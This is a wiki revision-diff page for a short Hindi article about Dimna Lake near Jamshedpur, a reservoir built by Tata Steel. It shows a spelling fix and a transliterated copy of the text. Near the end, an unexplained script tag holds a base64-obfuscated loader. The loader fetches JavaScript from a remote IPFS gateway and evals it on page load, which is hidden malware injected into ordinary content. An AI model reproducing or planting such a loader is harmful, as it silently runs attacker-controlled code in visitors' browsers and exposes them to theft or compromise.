Difference between revisions of "डिमना झील जमशेदपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "यहां" to "यहाँ")
Line 4: Line 4:
 
*दलमा पहाड़ी की तलहटी में बने इस कृत्रिम झील को देखने सालों भर पर्यटक आते रहते है।  
 
*दलमा पहाड़ी की तलहटी में बने इस कृत्रिम झील को देखने सालों भर पर्यटक आते रहते है।  
 
*दिसम्‍बर-जनवरी में महीने में पर्यटक यहाँ विशेष तौर पिकनि‍क मनाने आते है।  
 
*दिसम्‍बर-जनवरी में महीने में पर्यटक यहाँ विशेष तौर पिकनि‍क मनाने आते है।  
*इस झील का निर्माण टाटा स्‍टील ने जल संरक्षण के लिए तथा यहां के निवासियों के लिए करवाया था।  
+
*इस झील का निर्माण टाटा स्‍टील ने जल संरक्षण के लिए तथा यहाँ के निवासियों के लिए करवाया था।  
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 11:32, 26 September 2010

[[chitr:Dimna-Lake-Jamshedpur.jpg|thumb|250px|dimana jhil, jamashedapur
Dimna Lake, Jamshedpur]]

  • jharakhand ke shahar jamashedapur mean kee paryatan sthal hai jinamean se ye ek hai.
  • yah jamashedapur shahar se 13 kimi ki doori par sthit hai.
  • dalama paha di ki talahati mean bane is kritrim jhil ko dekhane saloan bhar paryatak ate rahate hai.
  • disamh‍bar-janavari mean mahine mean paryatak yahaan vishesh taur pikani‍k manane ate hai.
  • is jhil ka nirman tata sh‍til ne jal sanrakshan ke lie tatha yahaan ke nivasiyoan ke lie karavaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh